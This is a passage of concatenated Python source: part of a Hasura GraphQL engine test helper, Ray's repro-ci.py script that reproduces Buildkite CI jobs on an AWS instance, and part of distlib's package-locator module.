st_code, resp = self.v2q_f("queries/" + self.backend_suffix("clear_db")+ ".yaml")
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
if self.is_default_backend:
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
    def anyq(self, u, q, h, b=None, v=None):
resp = None
if v == 'GET':
resp = self.http.get(
self.hge_url + u,
headers=h
)
elif v == 'POST' and b:
# TODO: Figure out why the requests are failing with a byte object passed in as `data`
resp = self.http.post(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PATCH' and b:
resp = self.http.patch(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PUT' and b:
resp = self.http.put(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'DELETE':
resp = self.http.delete(
self.hge_url + u,
headers=h
)
else:
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
    def execute_query(self, q, url_path, headers={}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + url_path,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
    def v1q(self, q, headers={}):
return self.execute_query(q, "/v1/query", headers)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
    def v2q(self, q, headers={}):
return self.execute_query(q, "/v2/query", headers)
def v2q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v2q(yml.load(f))
def backend_suffix(self, filename):
if self.is_default_backend:
return filename
else:
return filename + "_" + self.backend
    def v1metadataq(self, q, headers={}):
return self.execute_query(q, "/v1/metadata", headers)
def v1metadataq_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1metadataq(yml.load(f))
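
    # For illustration, each *_f helper loads a YAML file with ruamel (to keep
    # key order) and posts it to its endpoint, e.g. (hypothetical file path):
    #
    #     st_code, resp = hge_ctx.v1q_f('queries/setup.yaml')
    #     assert st_code == 200, resp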
def teardown(self):
self.http.close()
self.engine.dispose()
# Close websockets:
self.ws_client.teardown()
self.ws_client_v1alpha1.teardown()
self.ws_client_relay.teardown()
self.ws_client_graphql_ws.teardown()
def v1GraphqlExplain(self, q, hdrs=None):
        headers = {}
        if hdrs is not None:
            headers = hdrs
        if self.hge_key is not None:
            headers['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(self.hge_url + '/v1/graphql/explain', json=q, headers=headers)
return resp.status_code, resp.json()
|
repro-ci.py
|
"""Create an AWS instance to reproduce Buildkite CI builds.
This script will take a Buildkite build URL as an argument and create
an AWS instance with the same properties running the same Docker container
as the original Buildkite runner. The user is then attached to this instance
and can reproduce any builds commands as if they were executed within the
runner.
This utility can be used to reproduce and debug build failures that come up
on the Buildkite runner instances but not on a local machine.
Optionally, build commands can be executed automatically. Filters can be added
to exclude some of these commands. For instance, some users may want to execute
all build commands except for the `bazel build` commands, which they would
like to execute manually.
Usage:
python repro-ci.py [-n instance-name] [-c] [-f filter1] [-f filter2] ...
Arguments:
-n: Instance name to be used. If an instance with this name already exists,
it will be reused.
-c: Execute commands after setting up the machine.
-f: Filter these commands (do not execute commands that match this
regex pattern).
"""
import base64
import json
import logging
import os
import random
import re
import shlex
import subprocess
import threading
import time
from numbers import Number
from typing import Any, Dict, List, Optional, Callable
import boto3
import click
import paramiko
import yaml
from pybuildkite.buildkite import Buildkite
def maybe_fetch_buildkite_token():
if os.environ.get("BUILDKITE_TOKEN", None) is None:
print("Missing BUILDKITE_TOKEN, retrieving from AWS secrets store")
os.environ["BUILDKITE_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"buildkite/ro-token")["SecretString"]
def escape(v: Any):
if isinstance(v, bool):
return f"{int(v)}"
elif isinstance(v, Number):
return str(v)
elif isinstance(v, list):
return " ".join(shlex.quote(w) for w in v)
else:
return v
def env_str(env: Dict[str, Any]):
kvs = []
for k, v in env.items():
if isinstance(v, bool):
kvs.append((k, int(v)))
elif isinstance(v, Number):
kvs.append((k, str(v)))
elif isinstance(v, list):
for i, w in enumerate(v):
kvs.append((f"{k}_{i}", w))
else:
kvs.append((k, v))
return " ".join(f"{k}={shlex.quote(v)}" for k, v in kvs)
def script_str(v: Any):
if isinstance(v, bool):
return f"\"{int(v)}\""
elif isinstance(v, Number):
return f"\"{v}\""
elif isinstance(v, list):
return "(" + " ".join(f"\"{shlex.quote(w)}\"" for w in v) + ")"
else:
return f"\"{shlex.quote(v)}\""
class ReproSession:
plugin_default_env = {
"docker": {
"BUILDKITE_PLUGIN_DOCKER_MOUNT_BUILDKITE_AGENT": False
}
}
def __init__(self,
buildkite_token: str,
instance_name: str = "repro-ci-dev",
logger: Optional[logging.Logger] = None):
self.logger = logger or logging.getLogger(self.__class__.__name__)
self.bk = Buildkite()
self.bk.set_access_token(buildkite_token)
self.ssh_user = "ec2-user"
self.ssh_key_name = "buildkite-repro-env"
self.ssh_key_file = "~/.ssh/buildkite-repro-env.pem"
self.ec2_client = boto3.client("ec2", region_name="us-west-2")
self.ec2_resource = boto3.resource("ec2", region_name="us-west-2")
self.org = None
self.pipeline = None
self.build_id = None
self.job_id = None
self.env: Dict[str, str] = {}
self.aws_instance_name = instance_name
self.aws_instance_id = None
self.aws_instance_ip = None
self.ssh = None
self.plugins = {}
self.skipped_commands = []
def set_session(self, session_url: str):
# E.g.:
# https://buildkite.com/ray-project/ray-builders-pr/
# builds/19635#55a0d71a-831e-4f68-b668-2b10c6f65ee6
pattern = re.compile(
"https://buildkite.com/([^/]+)/([^/]+)/builds/([0-9]+)#(.+)")
org, pipeline, build_id, job_id = pattern.match(session_url).groups()
self.logger.debug(f"Parsed session URL: {session_url}. "
f"Got org='{org}', pipeline='{pipeline}', "
f"build_id='{build_id}', job_id='{job_id}'.")
self.org = org
self.pipeline = pipeline
self.build_id = build_id
self.job_id = job_id
def fetch_env_variables(self, overwrite: Optional[Dict[str, Any]] = None):
assert self.bk
self.env = self.bk.jobs().get_job_environment_variables(
self.org, self.pipeline, self.build_id, self.job_id)["env"]
if overwrite:
self.env.update(overwrite)
return self.env
def aws_start_instance(self):
assert self.env
instance_type = self.env["BUILDKITE_AGENT_META_DATA_AWS_INSTANCE_TYPE"]
instance_ami = self.env["BUILDKITE_AGENT_META_DATA_AWS_AMI_ID"]
instance_sg = "sg-0ccfca2ef191c04ae"
instance_block_device_mappings = [{
"DeviceName": "/dev/xvda",
"Ebs": {
"VolumeSize": 500
}
}]
# Check if instance exists:
running_instances = self.ec2_resource.instances.filter(Filters=[{
"Name": "tag:repro_name",
"Values": [self.aws_instance_name]
}, {
"Name": "instance-state-name",
"Values": ["running"]
}])
self.logger.info(
f"Check if instance with name {self.aws_instance_name} "
f"already exists...")
for instance in running_instances:
self.aws_instance_id = instance.id
self.aws_instance_ip = instance.public_ip_address
self.logger.info(f"Found running instance {self.aws_instance_id}.")
return
self.logger.info(
f"Instance with name {self.aws_instance_name} not found, "
f"creating...")
# Else, not running, yet, start.
instance = self.ec2_resource.create_instances(
BlockDeviceMappings=instance_block_device_mappings,
ImageId=instance_ami,
InstanceType=instance_type,
KeyName=self.ssh_key_name,
SecurityGroupIds=[instance_sg],
TagSpecifications=[{
"ResourceType": "instance",
"Tags": [{
"Key": "repro_name",
"Value": self.aws_instance_name
}]
}],
MinCount=1,
MaxCount=1,
)[0]
self.aws_instance_id = instance.id
self.logger.info(
f"Created new instance with ID {self.aws_instance_id}")
def aws_wait_for_instance(self):
assert self.aws_instance_id
self.logger.info("Waiting for instance to come up...")
repro_instance_state = None
while repro_instance_state != "running":
detail = self.ec2_client.describe_instances(
InstanceIds=[self.aws_instance_id], )
repro_instance_state = \
detail["Reservations"][0]["Instances"][0]["State"]["Name"]
if repro_instance_state != "running":
time.sleep(2)
self.aws_instance_ip = detail["Reservations"][0]["Instances"][0][
"PublicIpAddress"]
def aws_stop_instance(self):
assert self.aws_instance_id
self.ec2_client.terminate_instances(
InstanceIds=[self.aws_instance_id], )
def print_stop_command(self):
click.secho("To stop this instance in the future, run this: ")
click.secho(
f"aws ec2 terminate-instances "
f"--instance-ids={self.aws_instance_id}",
bold=True)
def create_new_ssh_client(self):
assert self.aws_instance_ip
if self.ssh:
self.ssh.close()
self.logger.info(
"Creating SSH client and waiting for SSH to become available...")
ssh = paramiko.client.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
timeout = time.monotonic() + 60
while time.monotonic() < timeout:
try:
ssh.connect(
self.aws_instance_ip,
username=self.ssh_user,
key_filename=os.path.expanduser(self.ssh_key_file))
break
except paramiko.ssh_exception.NoValidConnectionsError:
self.logger.info("SSH not ready, yet, sleeping 5 seconds")
time.sleep(5)
self.ssh = ssh
return self.ssh
def close_ssh(self):
self.ssh.close()
def ssh_exec(self, command, quiet: bool = False, *args, **kwargs):
result = {}
def exec():
stdin, stdout, stderr = self.ssh.exec_command(
command, get_pty=True)
output = ""
for line in stdout.readlines():
output += line
if not quiet:
print(line, end="")
for line in stderr.readlines():
if not quiet:
print(line, end="")
result["output"] = output
thread = threading.Thread(target=exec)
thread.start()
status = time.monotonic() + 30
while thread.is_alive():
thread.join(2)
if time.monotonic() >= status and thread.is_alive():
self.logger.info("Still executing...")
status = time.monotonic() + 30
thread.join()
return result.get("output", "")
def execute_ssh_command(
self,
command: str,
env: Optional[Dict[str, str]] = None,
as_script: bool = False,
quiet: bool = False,
command_wrapper: Optional[Callable[[str], str]] = None) -> str:
assert self.ssh
if not command_wrapper:
def command_wrapper(s):
return s
full_env = self.env.copy()
if env:
full_env.update(env)
        if as_script:
            ftp = self.ssh.open_sftp()
            file = ftp.file("/tmp/script.sh", "w", -1)
            file.write("#!/bin/bash\n")
            # Write the merged environment so the script also sees the
            # Buildkite env, and so env=None does not crash here.
            for k, v in full_env.items():
                file.write(f"{k}={script_str(v)}\n")
            file.write(command + "\n")
file.flush()
ftp.close()
full_command = "bash /tmp/script.sh"
else:
full_command = f"export {env_str(full_env)}; {command}"
full_command = command_wrapper(full_command)
self.logger.debug(f"Executing command: {command}")
        output = self.ssh_exec(full_command, quiet=quiet)  # ssh_exec already requests a PTY
return output
def execute_ssh_commands(self,
commands: List[str],
env: Optional[Dict[str, str]] = None,
quiet: bool = False):
for command in commands:
self.execute_ssh_command(command, env=env, quiet=quiet)
def execute_docker_command(self,
command: str,
env: Optional[Dict[str, str]] = None,
quiet: bool = False):
def command_wrapper(s):
escaped = s.replace("'", "'\"'\"'")
return f"docker exec -it ray_container /bin/bash -ci '{escaped}'"
self.execute_ssh_command(
command, env=env, quiet=quiet, command_wrapper=command_wrapper)
def prepare_instance(self):
self.create_new_ssh_client()
output = self.execute_ssh_command("docker ps", quiet=True)
if "CONTAINER ID" in output:
self.logger.info("Instance already prepared.")
return
self.logger.info("Preparing instance (installing docker etc.)")
commands = [
"sudo yum install -y docker", "sudo service docker start",
f"sudo usermod -aG docker {self.ssh_user}"
]
self.execute_ssh_commands(commands, quiet=True)
self.create_new_ssh_client()
self.execute_ssh_command("docker ps", quiet=True)
self.docker_login()
def docker_login(self):
self.logger.info("Logging into docker...")
credentials = boto3.client(
"ecr", region_name="us-west-2").get_authorization_token()
token = base64.b64decode(credentials["authorizationData"][0][
"authorizationToken"]).decode("utf-8").replace("AWS:", "")
endpoint = credentials["authorizationData"][0]["proxyEndpoint"]
self.execute_ssh_command(
f"docker login -u AWS -p {token} {endpoint}", quiet=True)
def fetch_buildkite_plugins(self):
assert self.env
self.logger.info("Fetching Buildkite plugins")
plugins = json.loads(self.env["BUILDKITE_PLUGINS"])
for collection in plugins:
for plugin, options in collection.items():
plugin_url, plugin_version = plugin.split("#")
if not plugin_url.startswith(
"http://") or not plugin_url.startswith("https://"):
plugin_url = f"https://{plugin_url}"
plugin_name = plugin_url.split("/")[-1].rstrip(".git")
plugin_short = plugin_name.replace("-buildkite-plugin", "")
plugin_dir = f"~/{plugin_name}"
plugin_env = self.get_plugin_env(plugin_short, options)
self.plugins[plugin_short] = {
"name": plugin_name,
"options": options,
"short": plugin_short,
"url": plugin_url,
"version": plugin_version,
"dir": plugin_dir,
"env": plugin_env,
"details": {}
}
def get_plugin_env(self, plugin_short: str, options: Dict[str, Any]):
plugin_env = {}
for option, value in options.items():
option_name = option.replace("-", "_").upper()
env_name = f"BUILDKITE_PLUGIN_{plugin_short.upper()}_{option_name}"
plugin_env[env_name] = value
plugin_env.update(self.plugin_default_env.get(plugin_short, {}))
return plugin_env
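
    # For illustration (hypothetical options), get_plugin_env("docker",
    # {"image": "x", "shm-size": "2g"}) yields, in addition to the docker
    # defaults from plugin_default_env:
    #
    #     {"BUILDKITE_PLUGIN_DOCKER_IMAGE": "x",
    #      "BUILDKITE_PLUGIN_DOCKER_SHM_SIZE": "2g"}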
def install_buildkite_plugin(self, plugin: str):
assert plugin in self.plugins
self.logger.info(f"Installing Buildkite plugin: {plugin}")
plugin_dir = self.plugins[plugin]["dir"]
plugin_url = self.plugins[plugin]["url"]
plugin_version = self.plugins[plugin]["version"]
self.execute_ssh_command(
f"[ ! -e {plugin_dir} ] && git clone --depth 1 "
f"--branch {plugin_version} {plugin_url} {plugin_dir}",
quiet=True)
def load_plugin_details(self, plugin: str):
assert plugin in self.plugins
plugin_dir = self.plugins[plugin]["dir"]
yaml_str = self.execute_ssh_command(
f"cat {plugin_dir}/plugin.yml", quiet=True)
details = yaml.safe_load(yaml_str)
self.plugins[plugin]["details"] = details
return details
def execute_plugin_hook(self,
plugin: str,
hook: str,
env: Optional[Dict[str, Any]] = None,
script_command: Optional[str] = None):
assert plugin in self.plugins
self.logger.info(
f"Executing Buildkite hook for plugin {plugin}: {hook}. "
f"This pulls a Docker image and could take a while.")
plugin_dir = self.plugins[plugin]["dir"]
plugin_env = self.plugins[plugin]["env"].copy()
if env:
plugin_env.update(env)
script_command = script_command or "bash -l"
hook_script = f"{plugin_dir}/hooks/{hook}"
self.execute_ssh_command(
f"[ -f {hook_script} ] && cat {hook_script} | {script_command} ",
env=plugin_env,
as_script=False,
quiet=True,
)
def print_buildkite_command(self, skipped: bool = False):
print("-" * 80)
print("These are the commands you need to execute to fully reproduce "
"the run")
print("-" * 80)
print(self.env["BUILDKITE_COMMAND"])
print("-" * 80)
if skipped and self.skipped_commands:
print("Some of the commands above have already been run. "
"Remaining commands:")
print("-" * 80)
print("\n".join(self.skipped_commands))
print("-" * 80)
def run_buildkite_command(self,
command_filter: Optional[List[str]] = None):
commands = self.env["BUILDKITE_COMMAND"].split("\n")
regexes = [re.compile(cf) for cf in command_filter or []]
skipped_commands = []
for command in commands:
if any(rx.search(command) for rx in regexes):
self.logger.info(f"Filtered build command: {command}")
skipped_commands.append(command)
continue
self.logger.info(f"Executing build command: {command}")
self.execute_docker_command(command)
self.skipped_commands = skipped_commands
def transfer_env_to_container(self):
escaped = env_str(self.env).replace("'", "'\"'\"'")
self.execute_docker_command(
f"grep -q 'source ~/.env' $HOME/.bashrc "
f"|| echo 'source ~/.env' >> $HOME/.bashrc; "
f"echo 'export {escaped}' > $HOME/.env",
quiet=True)
def attach_to_container(self):
self.logger.info("Attaching to AWS instance...")
ssh_command = (f"ssh -ti {self.ssh_key_file} "
f"-o StrictHostKeyChecking=no "
f"-o ServerAliveInterval=30 "
f"{self.ssh_user}@{self.aws_instance_ip} "
f"'docker exec -it ray_container bash -l'")
subprocess.run(ssh_command, shell=True)
@click.command()
@click.argument("session_url", required=False)
@click.option("-n", "--instance-name", default="repro-ci-dev")
@click.option("-c", "--commands", is_flag=True, default=False)
@click.option("-f", "--filters", multiple=True, default=[])
def main(session_url: Optional[str],
instance_name: str = "repro-ci-dev",
commands: bool = False,
filters: Optional[List[str]] = None):
random.seed(1235)
logger = logging.getLogger("main")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter("[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s"))
logger.addHandler(handler)
maybe_fetch_buildkite_token()
repro = ReproSession(
os.environ["BUILDKITE_TOKEN"],
instance_name=instance_name,
logger=logger)
session_url = session_url or click.prompt(
"Please copy and paste the Buildkite job build URI here")
repro.set_session(session_url)
repro.fetch_env_variables()
repro.aws_start_instance()
repro.aws_wait_for_instance()
print("-" * 80)
click.secho("Instance ID: ", nl=False)
click.secho(repro.aws_instance_id, bold=True)
click.secho("Instance IP: ", nl=False)
click.secho(repro.aws_instance_ip, bold=True)
print("-" * 80)
logger.info(f"Instance IP: {repro.aws_instance_ip}")
repro.prepare_instance()
repro.docker_login()
repro.fetch_buildkite_plugins()
for plugin in repro.plugins:
repro.install_buildkite_plugin(plugin)
repro.execute_plugin_hook("dind", "pre-command")
repro.execute_plugin_hook(
"docker",
"command",
env={
"BUILDKITE_COMMAND": "sleep infinity",
"BUILDKITE_PLUGIN_DOCKER_TTY": "0",
"BUILDKITE_PLUGIN_DOCKER_MOUNT_CHECKOUT": "0",
},
script_command=("sed -E 's/"
"docker run/"
"docker run --name ray_container -d/g' | "
"bash -l"))
repro.create_new_ssh_client()
repro.print_buildkite_command()
if commands:
filters = filters or []
repro.run_buildkite_command(command_filter=filters)
repro.print_buildkite_command(skipped=True)
repro.transfer_env_to_container()
repro.attach_to_container()
logger.info("You are now detached from the AWS instance.")
if click.confirm("Stop AWS instance?", default=False):
repro.aws_stop_instance()
else:
repro.print_stop_command()
if __name__ == "__main__":
main()
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError:
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'http://python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
return client.list_packages()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None:
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None:
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme != 'https', 'pypi.python.org' in t.netloc,
is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
        Attempt to split a filename into project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
name1, name2 = name1.lower(), name2.lower()
if name1 == name2:
result = True
else:
# distribute replaces '-' by '_' in project names, so it
# can tell where the version starts in a filename.
result = name1.replace('_', '-') == name2.replace('_', '-')
return result
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='):
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/':
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if is_compatible(wheel, self.wheel_tags):
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e:
logger.warning('invalid path for wheel: %s', path)
elif path.endswith(self.downloadable_extensions):
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t:
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver:
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
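
    # For illustration (hypothetical URL; the filename split is heuristic), a
    # matching sdist link yields a dict such as:
    #
    #     convert_url_to_download_info(
    #         'https://example.com/flask/Flask-1.0.tar.gz', 'flask')
    #     # -> {'name': 'Flask', 'version': '1.0',
    #     #     'filename': 'Flask-1.0.tar.gz',
    #     #     'url': 'https://example.com/flask/Flask-1.0.tar.gz'}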
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None:
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception:
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd:
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
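
# A minimal usage sketch (network access and a live index are assumed; the
# project name and constraint are illustrative; SimpleScrapingLocator is
# defined further below):
#
#     locator = SimpleScrapingLocator('https://pypi.org/simple/')
#     dist = locator.locate('requests (>= 2.0)')
#     if dist is not None:
#         print(dist.name, dist.version, sorted(dist.download_urls))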
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
